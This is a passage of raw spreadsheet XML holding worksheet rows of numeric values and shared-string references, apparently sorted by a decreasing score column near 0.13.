      <c r="A23587" s="1">
        <v>27624.0</v>
      </c>
      <c r="B23587" s="2">
        <v>2.269006E7</v>
      </c>
      <c r="C23587" s="2" t="s">
        <v>22749</v>
      </c>
      <c r="D23587" s="2">
        <v>1.0</v>
      </c>
      <c r="E23587" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23587" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="23588" ht="15.75" customHeight="1">
      <c r="A23588" s="1">
        <v>14254.0</v>
      </c>
      <c r="B23588" s="2">
        <v>3.8383758E7</v>
      </c>
      <c r="C23588" s="2" t="s">
        <v>22750</v>
      </c>
      <c r="D23588" s="2">
        <v>1.0</v>
      </c>
      <c r="E23588" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23588" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23589" ht="15.75" customHeight="1">
      <c r="A23589" s="1">
        <v>19419.0</v>
      </c>
      <c r="B23589" s="2">
        <v>5.5631683E7</v>
      </c>
      <c r="C23589" s="2" t="s">
        <v>22751</v>
      </c>
      <c r="D23589" s="2">
        <v>1.0</v>
      </c>
      <c r="E23589" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23589" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23590" ht="15.75" customHeight="1">
      <c r="A23590" s="1">
        <v>21081.0</v>
      </c>
      <c r="B23590" s="2">
        <v>1.804104E7</v>
      </c>
      <c r="C23590" s="2" t="s">
        <v>22752</v>
      </c>
      <c r="D23590" s="2">
        <v>1.0</v>
      </c>
      <c r="E23590" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23590" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23591" ht="15.75" customHeight="1">
      <c r="A23591" s="1">
        <v>22630.0</v>
      </c>
      <c r="B23591" s="2">
        <v>4.0491775E7</v>
      </c>
      <c r="C23591" s="2" t="s">
        <v>22753</v>
      </c>
      <c r="D23591" s="2">
        <v>1.0</v>
      </c>
      <c r="E23591" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23591" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23592" ht="15.75" customHeight="1">
      <c r="A23592" s="1">
        <v>25127.0</v>
      </c>
      <c r="B23592" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C23592" s="2" t="s">
        <v>22754</v>
      </c>
      <c r="D23592" s="2">
        <v>1.0</v>
      </c>
      <c r="E23592" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23592" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23593" ht="15.75" customHeight="1">
      <c r="A23593" s="1">
        <v>27832.0</v>
      </c>
      <c r="B23593" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23593" s="2" t="s">
        <v>22755</v>
      </c>
      <c r="D23593" s="2">
        <v>1.0</v>
      </c>
      <c r="E23593" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23593" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23594" ht="15.75" customHeight="1">
      <c r="A23594" s="1">
        <v>32736.0</v>
      </c>
      <c r="B23594" s="2">
        <v>6016040.0</v>
      </c>
      <c r="C23594" s="2" t="s">
        <v>22756</v>
      </c>
      <c r="D23594" s="2">
        <v>1.0</v>
      </c>
      <c r="E23594" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23594" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="23595" ht="15.75" customHeight="1">
      <c r="A23595" s="1">
        <v>19764.0</v>
      </c>
      <c r="B23595" s="2">
        <v>5.6736846E7</v>
      </c>
      <c r="C23595" s="2" t="s">
        <v>22757</v>
      </c>
      <c r="D23595" s="2">
        <v>1.0</v>
      </c>
      <c r="E23595" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23595" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="23596" ht="15.75" customHeight="1">
      <c r="A23596" s="1">
        <v>24279.0</v>
      </c>
      <c r="B23596" s="2">
        <v>1.0541409E7</v>
      </c>
      <c r="C23596" s="2" t="s">
        <v>22758</v>
      </c>
      <c r="D23596" s="2">
        <v>1.0</v>
      </c>
      <c r="E23596" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23596" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="23597" ht="15.75" customHeight="1">
      <c r="A23597" s="1">
        <v>26728.0</v>
      </c>
      <c r="B23597" s="2">
        <v>1.8263342E7</v>
      </c>
      <c r="C23597" s="2" t="s">
        <v>22759</v>
      </c>
      <c r="D23597" s="2">
        <v>1.0</v>
      </c>
      <c r="E23597" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23597" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="23598" ht="15.75" customHeight="1">
      <c r="A23598" s="1">
        <v>26290.0</v>
      </c>
      <c r="B23598" s="2">
        <v>1.6468241E7</v>
      </c>
      <c r="C23598" s="2" t="s">
        <v>22688</v>
      </c>
      <c r="D23598" s="2">
        <v>1.0</v>
      </c>
      <c r="E23598" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23598" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="23599" ht="15.75" customHeight="1">
      <c r="A23599" s="1">
        <v>28351.0</v>
      </c>
      <c r="B23599" s="2">
        <v>2.5956254E7</v>
      </c>
      <c r="C23599" s="2" t="s">
        <v>22760</v>
      </c>
      <c r="D23599" s="2">
        <v>1.0</v>
      </c>
      <c r="E23599" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23599" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="23600" ht="15.75" customHeight="1">
      <c r="A23600" s="1">
        <v>28657.0</v>
      </c>
      <c r="B23600" s="2">
        <v>2.7410363E7</v>
      </c>
      <c r="C23600" s="2" t="s">
        <v>22761</v>
      </c>
      <c r="D23600" s="2">
        <v>1.0</v>
      </c>
      <c r="E23600" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23600" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="23601" ht="15.75" customHeight="1">
      <c r="A23601" s="1">
        <v>23824.0</v>
      </c>
      <c r="B23601" s="2">
        <v>7997738.0</v>
      </c>
      <c r="C23601" s="2" t="s">
        <v>22762</v>
      </c>
      <c r="D23601" s="2">
        <v>1.0</v>
      </c>
      <c r="E23601" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23601" s="2">
        <v>0.131720430107527</v>
      </c>
    </row>
    <row r="23602" ht="15.75" customHeight="1">
      <c r="A23602" s="1">
        <v>11287.0</v>
      </c>
      <c r="B23602" s="2">
        <v>2.0858031E7</v>
      </c>
      <c r="C23602" s="2" t="s">
        <v>22763</v>
      </c>
      <c r="D23602" s="2">
        <v>1.0</v>
      </c>
      <c r="E23602" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23602" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23603" ht="15.75" customHeight="1">
      <c r="A23603" s="1">
        <v>20991.0</v>
      </c>
      <c r="B23603" s="2">
        <v>1.7058924E7</v>
      </c>
      <c r="C23603" s="2" t="s">
        <v>22764</v>
      </c>
      <c r="D23603" s="2">
        <v>1.0</v>
      </c>
      <c r="E23603" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23603" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23604" ht="15.75" customHeight="1">
      <c r="A23604" s="1">
        <v>24115.0</v>
      </c>
      <c r="B23604" s="2">
        <v>9962563.0</v>
      </c>
      <c r="C23604" s="2" t="s">
        <v>22765</v>
      </c>
      <c r="D23604" s="2">
        <v>1.0</v>
      </c>
      <c r="E23604" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23604" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23605" ht="15.75" customHeight="1">
      <c r="A23605" s="1">
        <v>24294.0</v>
      </c>
      <c r="B23605" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C23605" s="2" t="s">
        <v>22766</v>
      </c>
      <c r="D23605" s="2">
        <v>1.0</v>
      </c>
      <c r="E23605" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23605" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23606" ht="15.75" customHeight="1">
      <c r="A23606" s="1">
        <v>26403.0</v>
      </c>
      <c r="B23606" s="2">
        <v>1.7058923E7</v>
      </c>
      <c r="C23606" s="2" t="s">
        <v>22764</v>
      </c>
      <c r="D23606" s="2">
        <v>1.0</v>
      </c>
      <c r="E23606" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23606" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23607" ht="15.75" customHeight="1">
      <c r="A23607" s="1">
        <v>27087.0</v>
      </c>
      <c r="B23607" s="2">
        <v>2.0492976E7</v>
      </c>
      <c r="C23607" s="2" t="s">
        <v>22767</v>
      </c>
      <c r="D23607" s="2">
        <v>1.0</v>
      </c>
      <c r="E23607" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23607" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23608" ht="15.75" customHeight="1">
      <c r="A23608" s="1">
        <v>31510.0</v>
      </c>
      <c r="B23608" s="2">
        <v>5.0738302E7</v>
      </c>
      <c r="C23608" s="2" t="s">
        <v>22768</v>
      </c>
      <c r="D23608" s="2">
        <v>1.0</v>
      </c>
      <c r="E23608" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23608" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23609" ht="15.75" customHeight="1">
      <c r="A23609" s="1">
        <v>31817.0</v>
      </c>
      <c r="B23609" s="2">
        <v>5252596.0</v>
      </c>
      <c r="C23609" s="2" t="s">
        <v>22769</v>
      </c>
      <c r="D23609" s="2">
        <v>1.0</v>
      </c>
      <c r="E23609" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23609" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23610" ht="15.75" customHeight="1">
      <c r="A23610" s="1">
        <v>32732.0</v>
      </c>
      <c r="B23610" s="2">
        <v>6014998.0</v>
      </c>
      <c r="C23610" s="2" t="s">
        <v>22769</v>
      </c>
      <c r="D23610" s="2">
        <v>1.0</v>
      </c>
      <c r="E23610" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23610" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23611" ht="15.75" customHeight="1">
      <c r="A23611" s="1">
        <v>34191.0</v>
      </c>
      <c r="B23611" s="2">
        <v>9960816.0</v>
      </c>
      <c r="C23611" s="2" t="s">
        <v>22770</v>
      </c>
      <c r="D23611" s="2">
        <v>1.0</v>
      </c>
      <c r="E23611" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23611" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="23612" ht="15.75" customHeight="1">
      <c r="A23612" s="1">
        <v>27724.0</v>
      </c>
      <c r="B23612" s="2">
        <v>2.3063025E7</v>
      </c>
      <c r="C23612" s="2" t="s">
        <v>22771</v>
      </c>
      <c r="D23612" s="2">
        <v>1.0</v>
      </c>
      <c r="E23612" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23612" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="23613" ht="15.75" customHeight="1">
      <c r="A23613" s="1">
        <v>23493.0</v>
      </c>
      <c r="B23613" s="2">
        <v>5752763.0</v>
      </c>
      <c r="C23613" s="2" t="s">
        <v>22772</v>
      </c>
      <c r="D23613" s="2">
        <v>1.0</v>
      </c>
      <c r="E23613" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23613" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="23614" ht="15.75" customHeight="1">
      <c r="A23614" s="1">
        <v>29920.0</v>
      </c>
      <c r="B23614" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C23614" s="2" t="s">
        <v>22773</v>
      </c>
      <c r="D23614" s="2">
        <v>1.0</v>
      </c>
      <c r="E23614" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23614" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="23615" ht="15.75" customHeight="1">
      <c r="A23615" s="1">
        <v>23457.0</v>
      </c>
      <c r="B23615" s="2">
        <v>5693483.0</v>
      </c>
      <c r="C23615" s="2" t="s">
        <v>22774</v>
      </c>
      <c r="D23615" s="2">
        <v>1.0</v>
      </c>
      <c r="E23615" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23615" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="23616" ht="15.75" customHeight="1">
      <c r="A23616" s="1">
        <v>7733.0</v>
      </c>
      <c r="B23616" s="2">
        <v>5.2041271E7</v>
      </c>
      <c r="C23616" s="2" t="s">
        <v>22775</v>
      </c>
      <c r="D23616" s="2">
        <v>1.0</v>
      </c>
      <c r="E23616" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23616" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="23617" ht="15.75" customHeight="1">
      <c r="A23617" s="1">
        <v>26592.0</v>
      </c>
      <c r="B23617" s="2">
        <v>1.7954885E7</v>
      </c>
      <c r="C23617" s="2" t="s">
        <v>778</v>
      </c>
      <c r="D23617" s="2">
        <v>1.0</v>
      </c>
      <c r="E23617" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23617" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="23618" ht="15.75" customHeight="1">
      <c r="A23618" s="1">
        <v>30126.0</v>
      </c>
      <c r="B23618" s="2">
        <v>3.6920513E7</v>
      </c>
      <c r="C23618" s="2" t="s">
        <v>22776</v>
      </c>
      <c r="D23618" s="2">
        <v>1.0</v>
      </c>
      <c r="E23618" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23618" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="23619" ht="15.75" customHeight="1">
      <c r="A23619" s="1">
        <v>31633.0</v>
      </c>
      <c r="B23619" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C23619" s="2" t="s">
        <v>22741</v>
      </c>
      <c r="D23619" s="2">
        <v>1.0</v>
      </c>
      <c r="E23619" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23619" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="23620" ht="15.75" customHeight="1">
      <c r="A23620" s="1">
        <v>20326.0</v>
      </c>
      <c r="B23620" s="2">
        <v>1.149335E7</v>
      </c>
      <c r="C23620" s="2" t="s">
        <v>22777</v>
      </c>
      <c r="D23620" s="2">
        <v>1.0</v>
      </c>
      <c r="E23620" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23620" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="23621" ht="15.75" customHeight="1">
      <c r="A23621" s="1">
        <v>21049.0</v>
      </c>
      <c r="B23621" s="2">
        <v>1.7706096E7</v>
      </c>
      <c r="C23621" s="2" t="s">
        <v>22778</v>
      </c>
      <c r="D23621" s="2">
        <v>1.0</v>
      </c>
      <c r="E23621" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23621" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="23622" ht="15.75" customHeight="1">
      <c r="A23622" s="1">
        <v>24648.0</v>
      </c>
      <c r="B23622" s="2">
        <v>1.1493349E7</v>
      </c>
      <c r="C23622" s="2" t="s">
        <v>22779</v>
      </c>
      <c r="D23622" s="2">
        <v>1.0</v>
      </c>
      <c r="E23622" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23622" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="23623" ht="15.75" customHeight="1">
      <c r="A23623" s="1">
        <v>26149.0</v>
      </c>
      <c r="B23623" s="2">
        <v>1.6062442E7</v>
      </c>
      <c r="C23623" s="2" t="s">
        <v>22780</v>
      </c>
      <c r="D23623" s="2">
        <v>1.0</v>
      </c>
      <c r="E23623" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23623" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="23624" ht="15.75" customHeight="1">
      <c r="A23624" s="1">
        <v>31755.0</v>
      </c>
      <c r="B23624" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C23624" s="2" t="s">
        <v>22781</v>
      </c>
      <c r="D23624" s="2">
        <v>1.0</v>
      </c>
      <c r="E23624" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23624" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="23625" ht="15.75" customHeight="1">
      <c r="A23625" s="1">
        <v>23155.0</v>
      </c>
      <c r="B23625" s="2">
        <v>5187702.0</v>
      </c>
      <c r="C23625" s="2" t="s">
        <v>22782</v>
      </c>
      <c r="D23625" s="2">
        <v>1.0</v>
      </c>
      <c r="E23625" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23625" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="23626" ht="15.75" customHeight="1">
      <c r="A23626" s="1">
        <v>33269.0</v>
      </c>
      <c r="B23626" s="2">
        <v>7370361.0</v>
      </c>
      <c r="C23626" s="2" t="s">
        <v>22783</v>
      </c>
      <c r="D23626" s="2">
        <v>1.0</v>
      </c>
      <c r="E23626" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23626" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="23627" ht="15.75" customHeight="1">
      <c r="A23627" s="1">
        <v>33633.0</v>
      </c>
      <c r="B23627" s="2">
        <v>8360850.0</v>
      </c>
      <c r="C23627" s="2" t="s">
        <v>22745</v>
      </c>
      <c r="D23627" s="2">
        <v>1.0</v>
      </c>
      <c r="E23627" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23627" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="23628" ht="15.75" customHeight="1">
      <c r="A23628" s="1">
        <v>28552.0</v>
      </c>
      <c r="B23628" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C23628" s="2" t="s">
        <v>22784</v>
      </c>
      <c r="D23628" s="2">
        <v>1.0</v>
      </c>
      <c r="E23628" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23628" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="23629" ht="15.75" customHeight="1">
      <c r="A23629" s="1">
        <v>302.0</v>
      </c>
      <c r="B23629" s="2">
        <v>1.5554509E7</v>
      </c>
      <c r="C23629" s="2" t="s">
        <v>22785</v>
      </c>
      <c r="D23629" s="2">
        <v>1.0</v>
      </c>
      <c r="E23629" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23629" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23630" ht="15.75" customHeight="1">
      <c r="A23630" s="1">
        <v>11795.0</v>
      </c>
      <c r="B23630" s="2">
        <v>2.4377364E7</v>
      </c>
      <c r="C23630" s="2" t="s">
        <v>22786</v>
      </c>
      <c r="D23630" s="2">
        <v>1.0</v>
      </c>
      <c r="E23630" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23630" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23631" ht="15.75" customHeight="1">
      <c r="A23631" s="1">
        <v>17553.0</v>
      </c>
      <c r="B23631" s="2">
        <v>5.0206307E7</v>
      </c>
      <c r="C23631" s="2" t="s">
        <v>22787</v>
      </c>
      <c r="D23631" s="2">
        <v>1.0</v>
      </c>
      <c r="E23631" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23631" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23632" ht="15.75" customHeight="1">
      <c r="A23632" s="1">
        <v>19620.0</v>
      </c>
      <c r="B23632" s="2">
        <v>5.624381E7</v>
      </c>
      <c r="C23632" s="2" t="s">
        <v>22788</v>
      </c>
      <c r="D23632" s="2">
        <v>1.0</v>
      </c>
      <c r="E23632" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23632" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23633" ht="15.75" customHeight="1">
      <c r="A23633" s="1">
        <v>19907.0</v>
      </c>
      <c r="B23633" s="2">
        <v>5.7345595E7</v>
      </c>
      <c r="C23633" s="2" t="s">
        <v>22789</v>
      </c>
      <c r="D23633" s="2">
        <v>1.0</v>
      </c>
      <c r="E23633" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23633" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23634" ht="15.75" customHeight="1">
      <c r="A23634" s="1">
        <v>20318.0</v>
      </c>
      <c r="B23634" s="2">
        <v>1.1460894E7</v>
      </c>
      <c r="C23634" s="2" t="s">
        <v>22790</v>
      </c>
      <c r="D23634" s="2">
        <v>1.0</v>
      </c>
      <c r="E23634" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23634" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23635" ht="15.75" customHeight="1">
      <c r="A23635" s="1">
        <v>20380.0</v>
      </c>
      <c r="B23635" s="2">
        <v>1.1907475E7</v>
      </c>
      <c r="C23635" s="2" t="s">
        <v>22791</v>
      </c>
      <c r="D23635" s="2">
        <v>1.0</v>
      </c>
      <c r="E23635" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23635" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23636" ht="15.75" customHeight="1">
      <c r="A23636" s="1">
        <v>20605.0</v>
      </c>
      <c r="B23636" s="2">
        <v>1.3893788E7</v>
      </c>
      <c r="C23636" s="2" t="s">
        <v>22792</v>
      </c>
      <c r="D23636" s="2">
        <v>1.0</v>
      </c>
      <c r="E23636" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23636" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23637" ht="15.75" customHeight="1">
      <c r="A23637" s="1">
        <v>21250.0</v>
      </c>
      <c r="B23637" s="2">
        <v>1.9985992E7</v>
      </c>
      <c r="C23637" s="2" t="s">
        <v>22793</v>
      </c>
      <c r="D23637" s="2">
        <v>1.0</v>
      </c>
      <c r="E23637" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23637" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23638" ht="15.75" customHeight="1">
      <c r="A23638" s="1">
        <v>21283.0</v>
      </c>
      <c r="B23638" s="2">
        <v>2.0421753E7</v>
      </c>
      <c r="C23638" s="2" t="s">
        <v>22794</v>
      </c>
      <c r="D23638" s="2">
        <v>1.0</v>
      </c>
      <c r="E23638" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23638" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23639" ht="15.75" customHeight="1">
      <c r="A23639" s="1">
        <v>21675.0</v>
      </c>
      <c r="B23639" s="2">
        <v>2.5032856E7</v>
      </c>
      <c r="C23639" s="2" t="s">
        <v>22795</v>
      </c>
      <c r="D23639" s="2">
        <v>1.0</v>
      </c>
      <c r="E23639" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23639" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23640" ht="15.75" customHeight="1">
      <c r="A23640" s="1">
        <v>22048.0</v>
      </c>
      <c r="B23640" s="2">
        <v>3.0348783E7</v>
      </c>
      <c r="C23640" s="2" t="s">
        <v>22796</v>
      </c>
      <c r="D23640" s="2">
        <v>1.0</v>
      </c>
      <c r="E23640" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23640" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23641" ht="15.75" customHeight="1">
      <c r="A23641" s="1">
        <v>22511.0</v>
      </c>
      <c r="B23641" s="2">
        <v>3.7452258E7</v>
      </c>
      <c r="C23641" s="2" t="s">
        <v>22797</v>
      </c>
      <c r="D23641" s="2">
        <v>1.0</v>
      </c>
      <c r="E23641" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23641" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23642" ht="15.75" customHeight="1">
      <c r="A23642" s="1">
        <v>23327.0</v>
      </c>
      <c r="B23642" s="2">
        <v>5.4522268E7</v>
      </c>
      <c r="C23642" s="2" t="s">
        <v>22798</v>
      </c>
      <c r="D23642" s="2">
        <v>1.0</v>
      </c>
      <c r="E23642" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23642" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23643" ht="15.75" customHeight="1">
      <c r="A23643" s="1">
        <v>23439.0</v>
      </c>
      <c r="B23643" s="2">
        <v>5665431.0</v>
      </c>
      <c r="C23643" s="2" t="s">
        <v>22799</v>
      </c>
      <c r="D23643" s="2">
        <v>1.0</v>
      </c>
      <c r="E23643" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23643" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23644" ht="15.75" customHeight="1">
      <c r="A23644" s="1">
        <v>23563.0</v>
      </c>
      <c r="B23644" s="2">
        <v>6150549.0</v>
      </c>
      <c r="C23644" s="2" t="s">
        <v>22800</v>
      </c>
      <c r="D23644" s="2">
        <v>1.0</v>
      </c>
      <c r="E23644" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23644" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23645" ht="15.75" customHeight="1">
      <c r="A23645" s="1">
        <v>24078.0</v>
      </c>
      <c r="B23645" s="2">
        <v>9696820.0</v>
      </c>
      <c r="C23645" s="2" t="s">
        <v>22801</v>
      </c>
      <c r="D23645" s="2">
        <v>1.0</v>
      </c>
      <c r="E23645" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23645" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23646" ht="15.75" customHeight="1">
      <c r="A23646" s="1">
        <v>24094.0</v>
      </c>
      <c r="B23646" s="2">
        <v>9793193.0</v>
      </c>
      <c r="C23646" s="2" t="s">
        <v>22802</v>
      </c>
      <c r="D23646" s="2">
        <v>1.0</v>
      </c>
      <c r="E23646" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23646" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23647" ht="15.75" customHeight="1">
      <c r="A23647" s="1">
        <v>24413.0</v>
      </c>
      <c r="B23647" s="2">
        <v>1.0826376E7</v>
      </c>
      <c r="C23647" s="2" t="s">
        <v>22803</v>
      </c>
      <c r="D23647" s="2">
        <v>1.0</v>
      </c>
      <c r="E23647" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23647" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23648" ht="15.75" customHeight="1">
      <c r="A23648" s="1">
        <v>24652.0</v>
      </c>
      <c r="B23648" s="2">
        <v>1.1501569E7</v>
      </c>
      <c r="C23648" s="2" t="s">
        <v>22804</v>
      </c>
      <c r="D23648" s="2">
        <v>1.0</v>
      </c>
      <c r="E23648" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23648" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23649" ht="15.75" customHeight="1">
      <c r="A23649" s="1">
        <v>25212.0</v>
      </c>
      <c r="B23649" s="2">
        <v>1.3228293E7</v>
      </c>
      <c r="C23649" s="2" t="s">
        <v>22805</v>
      </c>
      <c r="D23649" s="2">
        <v>1.0</v>
      </c>
      <c r="E23649" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23649" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23650" ht="15.75" customHeight="1">
      <c r="A23650" s="1">
        <v>25457.0</v>
      </c>
      <c r="B23650" s="2">
        <v>1.3954786E7</v>
      </c>
      <c r="C23650" s="2" t="s">
        <v>22806</v>
      </c>
      <c r="D23650" s="2">
        <v>1.0</v>
      </c>
      <c r="E23650" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23650" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23651" ht="15.75" customHeight="1">
      <c r="A23651" s="1">
        <v>26292.0</v>
      </c>
      <c r="B23651" s="2">
        <v>1.6485596E7</v>
      </c>
      <c r="C23651" s="2" t="s">
        <v>22807</v>
      </c>
      <c r="D23651" s="2">
        <v>1.0</v>
      </c>
      <c r="E23651" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23651" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23652" ht="15.75" customHeight="1">
      <c r="A23652" s="1">
        <v>27393.0</v>
      </c>
      <c r="B23652" s="2">
        <v>2.178937E7</v>
      </c>
      <c r="C23652" s="2" t="s">
        <v>22808</v>
      </c>
      <c r="D23652" s="2">
        <v>1.0</v>
      </c>
      <c r="E23652" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23652" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23653" ht="15.75" customHeight="1">
      <c r="A23653" s="1">
        <v>27816.0</v>
      </c>
      <c r="B23653" s="2">
        <v>2.3356459E7</v>
      </c>
      <c r="C23653" s="2" t="s">
        <v>22809</v>
      </c>
      <c r="D23653" s="2">
        <v>1.0</v>
      </c>
      <c r="E23653" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23653" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="23654" ht="15.75" customHeight="1">
      <c r="A23654" s="1">
        <v>28207.0</v>
      </c>
